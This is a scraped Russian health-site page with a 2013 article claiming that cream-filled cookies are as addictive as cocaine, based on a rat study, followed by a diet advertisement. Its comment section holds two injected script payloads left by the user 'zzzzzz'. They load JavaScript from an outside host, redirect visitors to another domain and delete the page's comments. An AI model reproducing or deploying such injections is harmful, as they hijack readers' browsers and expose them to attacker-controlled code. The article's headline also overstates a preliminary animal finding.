Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сладкое печенье вызывает ...  >>  Сладкое печенье вызывает такую же зависимость, как кокаин
 
Обратная связь
 

Сладкое печенье вызывает такую же зависимость, как кокаин

Размер шрифта
16 декабря 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Нейрофизиологи из Коннектикута выяснили, что ваше любимое лакомство в известном смысле очень напоминает тяжелые наркотики.

Сладкое печенье вызывает такую же зависимость, как кокаин

Ученые задались целью выяснить, могут ли продукты с высоким содержанием жира и/или сахара вызывать физическую зависимость. Научную группу возглавил профессор Джозеф Шредер. Объектом исследования стали лабораторные крысы.

Выяснилось, что самое банальное шоколадное печенье с кремовой начинкой стимулирует центр удовольствия столь же эффективно, как морфин или кокаин! При этом число активированных нейронов оказалось даже больше, чем в случае тяжелых наркотиков.

«Наша работа добавляет цемента в фундамент теории о зависимости, вызываемой высокоуглеводными и жирными продуктами», – заявляет Шредер. «Эта теория объясняет, почему некоторые люди не могут побороть гастрономическое искушение, несмотря на то что, знают о потенциальном вреде».

Суть исследования заключалась в следующем. Крысы помещались в лабиринт, в одном из закутков которого лежало шоколадное печенье, а в другом – плошка с рисовой кашей. («Крысы, так же как и люди, не испытывают особо бурных чувств относительно этого простого блюда», – поясняет Шредер). Животным предоставлялась полная свобода выбора: они могли выбрать  абсолютно любой участок лабиринта. Далее ученые измеряли количество времени, проведенного крысами в «сладком» закутке. Разумеется, оказалось, что крысы значительно чаще забегали именно в этот участок лабиринта.

Что интересно, животные в первую очередь съедали кремовую начинку, лишь потом отдавая должное самому печенью.

Аналогичный эксперимент был проведен на другой группе животных. Разница заключалась в том, что вместо риса и печенья крыс «соблазняли» инъекциями. В одном участке лабиринта им вкалывали морфин или кокаин, в другом – обычный физраствор. Вполне закономерно, что последний не слишком-то прельщал грызунов, и они большую часть времени проводили в противоположном углу лабиринта.

Сравнивая временные показатели этих двух экспериментов, ученые пришли к выводу, что печенье и тяжелые наркотики вызывают у крыс сопоставимую зависимость.

Далее с помощью иммуногистохимических методов исследователи измерили уровень экспрессии особого белка (он называется c-Fos), который является маркером активности нервных клеток в «центре удовольствия» головного мозга.

Выяснилось, что шоколадное печенье активировало значительно большее количество нейронов, чем морфин и кокаин!

«Таким образом, результаты, полученные в ходе наблюдения за животными, подтвердились лабораторными данными», – говорит Шредер.

Так что, безусловно признавая значимость проблемы наркомании, мы не должны забывать, что не менее сильные наркотики продаются абсолютно легально, и они тоже очень опасны для нашего здоровья.

Не будьте наркоманом! Специально для вас создана «Диета Елены Малышевой». Уже готовая правильная еда будет доставлена в любое удобное для вас место и время! Вам останется только есть и худеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Жирная еда делает вас стервой!   Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Гормон секса не даст вам наесться!  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда, которая заставляет вас ЕСТЬ

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.